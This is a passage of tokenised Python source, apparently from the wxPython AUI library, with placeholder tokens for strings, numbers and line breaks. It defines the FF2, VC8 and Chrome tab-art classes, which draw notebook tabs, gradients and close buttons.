AUI_NB_CLOSE_ON_TAB_LEFT == <NUM_LIT:0> or not close_button_width : <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT>" <EOL> if page . active : <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx , texty , dummy = dc . 
GetMultiLineTextExtent ( caption ) <EOL> else : <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width ) <EOL> ypos = drawn_tab_yoff + ( drawn_tab_height ) / <NUM_LIT:2> - ( texty / <NUM_LIT:2> ) - <NUM_LIT:1> + shift <EOL> offset_focus = text_offset <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> textx += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if ( agwFlags & AUI_NB_NO_TAB_FOCUS ) == <NUM_LIT:0> : <EOL> self . DrawFocusRectangle ( dc , page , wnd , draw_text , offset_focus , bitmap_offset , drawn_tab_yoff + shift , <EOL> drawn_tab_height + shift , rectx , recty ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> bmp = self . _disabled_close_bmp <EOL> if close_button_state == AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif close_button_state == AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . Rect ( tab_x + <NUM_LIT:4> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . 
GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> else : <EOL> rect = wx . Rect ( tab_x + tab_width - close_button_width - <NUM_LIT:3> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> rect = IndentPressedBitmap ( rect , close_button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_button_rect = rect <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent <EOL> class FF2TabArt ( AuiDefaultTabArt ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . __init__ ( self ) <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> def GetTabSize ( self , dc , wnd , caption , bitmap , active , close_button_state , control ) : <EOL> """<STR_LIT>""" <EOL> tab_size , x_extent = AuiDefaultTabArt . GetTabSize ( self , dc , wnd , caption , bitmap , <EOL> active , close_button_state , control ) <EOL> tab_width , tab_height = tab_size <EOL> tab_height += <NUM_LIT:2> <EOL> return ( tab_width , tab_height ) , x_extent <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> control = page . control <EOL> tab_size , x_extent = self . GetTabSize ( dc , wnd , page . caption , page . bitmap , <EOL> page . active , close_button_state , control ) <EOL> tab_height = self . _tab_ctrl_height - <NUM_LIT:2> <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . 
height - tab_height <EOL> clip_width = tab_width <EOL> if tab_x + clip_width > in_rect . x + in_rect . width - <NUM_LIT:4> : <EOL> clip_width = ( in_rect . x + in_rect . width ) - tab_x - <NUM_LIT:4> <EOL> dc . SetClippingRegion ( tab_x , tab_y , clip_width + <NUM_LIT:1> , tab_height - <NUM_LIT:3> ) <EOL> tabPoints = [ wx . Point ( ) for i in xrange ( <NUM_LIT:7> ) ] <EOL> adjust = <NUM_LIT:0> <EOL> if not page . active : <EOL> adjust = <NUM_LIT:1> <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> tabPoints [ <NUM_LIT:0> ] . x = tab_x + <NUM_LIT:3> <EOL> tabPoints [ <NUM_LIT:0> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ <NUM_LIT:3> ] or [ tab_height - <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:1> ] . x = tabPoints [ <NUM_LIT:0> ] . x <EOL> tabPoints [ <NUM_LIT:1> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ tab_height - ( vertical_border_padding + <NUM_LIT:2> ) - adjust ] or [ ( vertical_border_padding + <NUM_LIT:2> ) + adjust ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:2> ] . x = tabPoints [ <NUM_LIT:1> ] . x + <NUM_LIT:2> <EOL> tabPoints [ <NUM_LIT:2> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ tab_height - vertical_border_padding - adjust ] or [ vertical_border_padding + adjust ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:3> ] . x = tab_x + tab_width - <NUM_LIT:2> <EOL> tabPoints [ <NUM_LIT:3> ] . y = tabPoints [ <NUM_LIT:2> ] . y <EOL> tabPoints [ <NUM_LIT:4> ] . x = tabPoints [ <NUM_LIT:3> ] . x + <NUM_LIT:2> <EOL> tabPoints [ <NUM_LIT:4> ] . y = tabPoints [ <NUM_LIT:1> ] . y <EOL> tabPoints [ <NUM_LIT:5> ] . x = tabPoints [ <NUM_LIT:4> ] . x <EOL> tabPoints [ <NUM_LIT:5> ] . y = tabPoints [ <NUM_LIT:0> ] . y <EOL> tabPoints [ <NUM_LIT:6> ] . x = tabPoints [ <NUM_LIT:0> ] . x <EOL> tabPoints [ <NUM_LIT:6> ] . y = tabPoints [ <NUM_LIT:0> ] . y <EOL> rr = wx . RectPP ( tabPoints [ <NUM_LIT:2> ] , tabPoints [ <NUM_LIT:5> ] ) <EOL> self . DrawTabBackground ( dc , rr , page . active , ( agwFlags & AUI_NB_BOTTOM ) == <NUM_LIT:0> ) <EOL> dc . SetBrush ( wx . 
TRANSPARENT_BRUSH ) <EOL> dc . SetPen ( wx . Pen ( wx . SystemSettings_GetColour ( wx . SYS_COLOUR_BTNSHADOW ) ) ) <EOL> dc . DrawPolygon ( tabPoints ) <EOL> if page . active : <EOL> dc . DrawLine ( tabPoints [ <NUM_LIT:0> ] . x + <NUM_LIT:1> , tabPoints [ <NUM_LIT:0> ] . y , tabPoints [ <NUM_LIT:5> ] . x , tabPoints [ <NUM_LIT:0> ] . y ) <EOL> drawn_tab_yoff = tabPoints [ <NUM_LIT:1> ] . y <EOL> drawn_tab_height = tabPoints [ <NUM_LIT:0> ] . y - tabPoints [ <NUM_LIT:2> ] . y <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset += close_button_width - <NUM_LIT:4> <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) ) <EOL> pagebitmap = page . dis_bitmap <EOL> else : <EOL> dc . SetTextForeground ( page . text_colour ) <EOL> pagebitmap = page . bitmap <EOL> shift = - <NUM_LIT:1> <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> shift = <NUM_LIT:2> <EOL> bitmap_offset = <NUM_LIT:0> <EOL> if pagebitmap . IsOk ( ) : <EOL> bitmap_offset = tab_x + <NUM_LIT:8> <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT and close_button_width : <EOL> bitmap_offset += close_button_width - <NUM_LIT:4> <EOL> dc . DrawBitmap ( pagebitmap , bitmap_offset , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( pagebitmap . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> True ) <EOL> text_offset = bitmap_offset + pagebitmap . GetWidth ( ) <EOL> text_offset += <NUM_LIT:3> <EOL> else : <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT == <NUM_LIT:0> or not close_button_width : <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT>" <EOL> if page . active : <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx , texty , dummy = dc . 
GetMultiLineTextExtent ( caption ) <EOL> else : <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width + <NUM_LIT:1> ) <EOL> else : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width ) <EOL> ypos = drawn_tab_yoff + drawn_tab_height / <NUM_LIT:2> - texty / <NUM_LIT:2> - <NUM_LIT:1> + shift <EOL> offset_focus = text_offset <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> textx += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> if ( agwFlags & AUI_NB_NO_TAB_FOCUS ) == <NUM_LIT:0> : <EOL> self . DrawFocusRectangle ( dc , page , wnd , draw_text , offset_focus , bitmap_offset , drawn_tab_yoff + shift , <EOL> drawn_tab_height , rectx , recty ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> bmp = self . _disabled_close_bmp <EOL> if close_button_state == AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif close_button_state == AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . 
Rect ( tab_x + <NUM_LIT:5> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> else : <EOL> rect = wx . Rect ( tab_x + tab_width - close_button_width - <NUM_LIT:3> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> rect = IndentPressedBitmap ( rect , close_button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_button_rect = rect <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent <EOL> def DrawTabBackground ( self , dc , rect , focus , upperTabs ) : <EOL> """<STR_LIT>""" <EOL> regPts = [ wx . Point ( ) for indx in xrange ( <NUM_LIT:9> ) ] <EOL> if focus : <EOL> if upperTabs : <EOL> leftPt = wx . Point ( rect . x , rect . y + ( rect . height / <NUM_LIT:10> ) * <NUM_LIT:8> ) <EOL> rightPt = wx . Point ( rect . x + rect . width - <NUM_LIT:2> , rect . y + ( rect . height / <NUM_LIT:10> ) * <NUM_LIT:8> ) <EOL> else : <EOL> leftPt = wx . Point ( rect . x , rect . y + ( rect . height / <NUM_LIT:10> ) * <NUM_LIT:5> ) <EOL> rightPt = wx . Point ( rect . x + rect . width - <NUM_LIT:2> , rect . y + ( rect . height / <NUM_LIT:10> ) * <NUM_LIT:5> ) <EOL> else : <EOL> leftPt = wx . Point ( rect . x , rect . y + ( rect . height / <NUM_LIT:2> ) ) <EOL> rightPt = wx . Point ( rect . x + rect . width - <NUM_LIT:2> , rect . y + ( rect . height / <NUM_LIT:2> ) ) <EOL> top = wx . RectPP ( rect . GetTopLeft ( ) , rightPt ) <EOL> bottom = wx . RectPP ( leftPt , rect . GetBottomRight ( ) ) <EOL> topStartColour = wx . WHITE <EOL> if not focus : <EOL> topStartColour = LightColour ( wx . SystemSettings_GetColour ( wx . SYS_COLOUR_3DFACE ) , <NUM_LIT:50> ) <EOL> topEndColour = wx . SystemSettings_GetColour ( wx . 
SYS_COLOUR_3DFACE ) <EOL> bottomStartColour = topEndColour <EOL> bottomEndColour = topEndColour <EOL> if upperTabs : <EOL> if focus : <EOL> dc . GradientFillLinear ( top , topStartColour , topEndColour , wx . SOUTH ) <EOL> dc . GradientFillLinear ( bottom , bottomStartColour , bottomEndColour , wx . SOUTH ) <EOL> else : <EOL> dc . GradientFillLinear ( top , topEndColour , topStartColour , wx . SOUTH ) <EOL> dc . GradientFillLinear ( bottom , bottomStartColour , bottomEndColour , wx . SOUTH ) <EOL> else : <EOL> if focus : <EOL> dc . GradientFillLinear ( bottom , topEndColour , bottomEndColour , wx . SOUTH ) <EOL> dc . GradientFillLinear ( top , topStartColour , topStartColour , wx . SOUTH ) <EOL> else : <EOL> dc . GradientFillLinear ( bottom , bottomStartColour , bottomEndColour , wx . SOUTH ) <EOL> dc . GradientFillLinear ( top , topEndColour , topStartColour , wx . SOUTH ) <EOL> dc . SetBrush ( wx . TRANSPARENT_BRUSH ) <EOL> class VC8TabArt ( AuiDefaultTabArt ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . __init__ ( self ) <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> def SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) <EOL> minTabWidth , maxTabWidth = minMaxTabWidth <EOL> if minTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = max ( self . _fixed_tab_width , minTabWidth ) <EOL> if maxTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = min ( self . _fixed_tab_width , maxTabWidth ) <EOL> self . 
_fixed_tab_width -= <NUM_LIT:5> <EOL> def GetTabSize ( self , dc , wnd , caption , bitmap , active , close_button_state , control = None ) : <EOL> """<STR_LIT>""" <EOL> tab_size , x_extent = AuiDefaultTabArt . GetTabSize ( self , dc , wnd , caption , bitmap , <EOL> active , close_button_state , control ) <EOL> tab_width , tab_height = tab_size <EOL> tab_width += <NUM_LIT:10> <EOL> if not bitmap . IsOk ( ) : <EOL> tab_width += <NUM_LIT:5> <EOL> tab_height += <NUM_LIT:2> <EOL> return ( tab_width , tab_height ) , x_extent <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> control = page . control <EOL> tab_size , x_extent = self . GetTabSize ( dc , wnd , page . caption , page . bitmap , <EOL> page . active , close_button_state , control ) <EOL> tab_height = self . _tab_ctrl_height - <NUM_LIT:1> <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . height - tab_height <EOL> clip_width = tab_width + <NUM_LIT:3> <EOL> if tab_x + clip_width > in_rect . x + in_rect . width - <NUM_LIT:4> : <EOL> clip_width = ( in_rect . x + in_rect . width ) - tab_x - <NUM_LIT:4> <EOL> tabPoints = [ wx . Point ( ) for i in xrange ( <NUM_LIT:8> ) ] <EOL> adjust = <NUM_LIT:0> <EOL> if not page . active : <EOL> adjust = <NUM_LIT:1> <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> tabPoints [ <NUM_LIT:0> ] . x = ( agwFlags & AUI_NB_BOTTOM and [ tab_x ] or [ tab_x + adjust ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:0> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ <NUM_LIT:2> ] or [ tab_height - <NUM_LIT:3> ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:1> ] . x = tabPoints [ <NUM_LIT:0> ] . x + tab_height - vertical_border_padding - <NUM_LIT:3> - adjust <EOL> tabPoints [ <NUM_LIT:1> ] . 
y = ( agwFlags & AUI_NB_BOTTOM and [ tab_height - ( vertical_border_padding + <NUM_LIT:2> ) ] or [ ( vertical_border_padding + <NUM_LIT:2> ) ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:2> ] . x = tabPoints [ <NUM_LIT:1> ] . x + <NUM_LIT:4> <EOL> tabPoints [ <NUM_LIT:2> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ tab_height - vertical_border_padding ] or [ vertical_border_padding ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:3> ] . x = tabPoints [ <NUM_LIT:2> ] . x + tab_width - tab_height + vertical_border_padding <EOL> tabPoints [ <NUM_LIT:3> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ tab_height - vertical_border_padding ] or [ vertical_border_padding ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:4> ] . x = tabPoints [ <NUM_LIT:3> ] . x + <NUM_LIT:1> <EOL> tabPoints [ <NUM_LIT:4> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ tabPoints [ <NUM_LIT:3> ] . y - <NUM_LIT:1> ] or [ tabPoints [ <NUM_LIT:3> ] . y + <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:5> ] . x = tabPoints [ <NUM_LIT:4> ] . x + <NUM_LIT:1> <EOL> tabPoints [ <NUM_LIT:5> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ ( tabPoints [ <NUM_LIT:4> ] . y - <NUM_LIT:1> ) ] or [ tabPoints [ <NUM_LIT:4> ] . y + <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:6> ] . x = tabPoints [ <NUM_LIT:2> ] . x + tab_width - tab_height + <NUM_LIT:2> + vertical_border_padding <EOL> tabPoints [ <NUM_LIT:6> ] . y = tabPoints [ <NUM_LIT:0> ] . y <EOL> tabPoints [ <NUM_LIT:7> ] . x = tabPoints [ <NUM_LIT:0> ] . x <EOL> tabPoints [ <NUM_LIT:7> ] . y = tabPoints [ <NUM_LIT:0> ] . y <EOL> self . FillVC8GradientColour ( dc , tabPoints , page . active ) <EOL> dc . SetBrush ( wx . TRANSPARENT_BRUSH ) <EOL> dc . SetPen ( wx . Pen ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_BTNSHADOW ) ) ) <EOL> dc . DrawPolygon ( tabPoints ) <EOL> if page . active : <EOL> dc . SetPen ( wx . WHITE_PEN ) <EOL> dc . DrawLine ( tabPoints [ <NUM_LIT:0> ] . x , tabPoints [ <NUM_LIT:0> ] . y , tabPoints [ <NUM_LIT:6> ] . 
x , tabPoints [ <NUM_LIT:6> ] . y ) <EOL> dc . SetClippingRegion ( tab_x , tab_y , clip_width + <NUM_LIT:2> , tab_height - <NUM_LIT:3> ) <EOL> drawn_tab_yoff = tabPoints [ <NUM_LIT:1> ] . y <EOL> drawn_tab_height = tabPoints [ <NUM_LIT:0> ] . y - tabPoints [ <NUM_LIT:2> ] . y <EOL> text_offset = tab_x + <NUM_LIT:20> <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset += close_button_width <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) ) <EOL> pagebitmap = page . dis_bitmap <EOL> else : <EOL> dc . SetTextForeground ( page . text_colour ) <EOL> pagebitmap = page . bitmap <EOL> shift = <NUM_LIT:0> <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> shift = ( page . active and [ <NUM_LIT:1> ] or [ <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> bitmap_offset = <NUM_LIT:0> <EOL> if pagebitmap . IsOk ( ) : <EOL> bitmap_offset = tab_x + <NUM_LIT:20> <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT and close_button_width : <EOL> bitmap_offset += close_button_width <EOL> dc . DrawBitmap ( pagebitmap , bitmap_offset , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( pagebitmap . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> True ) <EOL> text_offset = bitmap_offset + pagebitmap . GetWidth ( ) <EOL> text_offset += <NUM_LIT:3> <EOL> else : <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT == <NUM_LIT:0> or not close_button_width : <EOL> text_offset = tab_x + tab_height <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT>" <EOL> if page . active : <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> else : <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx , texty , dummy = dc . 
GetMultiLineTextExtent ( caption ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) ) <EOL> else : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width ) <EOL> ypos = drawn_tab_yoff + drawn_tab_height / <NUM_LIT:2> - texty / <NUM_LIT:2> - <NUM_LIT:1> + shift <EOL> offset_focus = text_offset <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> textx += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> if ( agwFlags & AUI_NB_NO_TAB_FOCUS ) == <NUM_LIT:0> : <EOL> self . DrawFocusRectangle ( dc , page , wnd , draw_text , offset_focus , bitmap_offset , drawn_tab_yoff + shift , <EOL> drawn_tab_height + shift , rectx , recty ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> bmp = self . _disabled_close_bmp <EOL> if close_button_state == AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif close_button_state == AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> if page . active : <EOL> xpos = tab_x + tab_width - close_button_width + <NUM_LIT:3> <EOL> else : <EOL> xpos = tab_x + tab_width - close_button_width - <NUM_LIT:5> <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . 
Rect ( tab_x + <NUM_LIT:20> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> else : <EOL> rect = wx . Rect ( xpos , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> rect = IndentPressedBitmap ( rect , close_button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_button_rect = rect <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , x_extent , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent <EOL> def FillVC8GradientColour ( self , dc , tabPoints , active ) : <EOL> """<STR_LIT>""" <EOL> xList = [ pt . x for pt in tabPoints ] <EOL> yList = [ pt . y for pt in tabPoints ] <EOL> minx , maxx = min ( xList ) , max ( xList ) <EOL> miny , maxy = min ( yList ) , max ( yList ) <EOL> rect = wx . Rect ( minx , maxy , maxx - minx , miny - maxy + <NUM_LIT:1> ) <EOL> region = wx . RegionFromPoints ( tabPoints ) <EOL> if self . _buttonRect . width > <NUM_LIT:0> : <EOL> buttonRegion = wx . Region ( * self . _buttonRect ) <EOL> region . XorRegion ( buttonRegion ) <EOL> dc . SetClippingRegionAsRegion ( region ) <EOL> if active : <EOL> bottom_colour = top_colour = wx . WHITE <EOL> else : <EOL> bottom_colour = StepColour ( self . _base_colour , <NUM_LIT> ) <EOL> top_colour = StepColour ( self . _base_colour , <NUM_LIT> ) <EOL> dc . GradientFillLinear ( rect , top_colour , bottom_colour , wx . SOUTH ) <EOL> dc . DestroyClippingRegion ( ) <EOL> class ChromeTabArt ( AuiDefaultTabArt ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . __init__ ( self ) <EOL> self . SetBitmaps ( mirror = False ) <EOL> closeBmp = tab_close . GetBitmap ( ) <EOL> closeHBmp = tab_close_h . GetBitmap ( ) <EOL> closePBmp = tab_close_p . GetBitmap ( ) <EOL> self . 
SetCustomButton ( AUI_BUTTON_CLOSE , AUI_BUTTON_STATE_NORMAL , closeBmp ) <EOL> self . SetCustomButton ( AUI_BUTTON_CLOSE , AUI_BUTTON_STATE_HOVER , closeHBmp ) <EOL> self . SetCustomButton ( AUI_BUTTON_CLOSE , AUI_BUTTON_STATE_PRESSED , closePBmp ) <EOL> def SetAGWFlags ( self , agwFlags ) : <EOL> """<STR_LIT>""" <EOL> if agwFlags & AUI_NB_TOP : <EOL> self . SetBitmaps ( mirror = False ) <EOL> elif agwFlags & AUI_NB_BOTTOM : <EOL> self . SetBitmaps ( mirror = True ) <EOL> AuiDefaultTabArt . SetAGWFlags ( self , agwFlags ) <EOL> def SetBitmaps ( self , mirror ) : <EOL> """<STR_LIT>""" <EOL> bmps = [ tab_active_left . GetBitmap ( ) , tab_active_center . GetBitmap ( ) , <EOL> tab_active_right . GetBitmap ( ) , tab_inactive_left . GetBitmap ( ) , <EOL> tab_inactive_center . GetBitmap ( ) , tab_inactive_right . GetBitmap ( ) ] <EOL> if mirror : <EOL> for indx , bmp in enumerate ( bmps ) : <EOL> img = bmp . ConvertToImage ( ) <EOL> img = img . Mirror ( horizontally = False ) <EOL> bmps [ indx ] = img . ConvertToBitmap ( ) <EOL> self . _leftActiveBmp = bmps [ <NUM_LIT:0> ] <EOL> self . _centerActiveBmp = bmps [ <NUM_LIT:1> ] <EOL> self . _rightActiveBmp = bmps [ <NUM_LIT:2> ] <EOL> self . _leftInactiveBmp = bmps [ <NUM_LIT:3> ] <EOL> self . _centerInactiveBmp = bmps [ <NUM_LIT:4> ] <EOL> self . _rightInactiveBmp = bmps [ <NUM_LIT:5> ] <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> 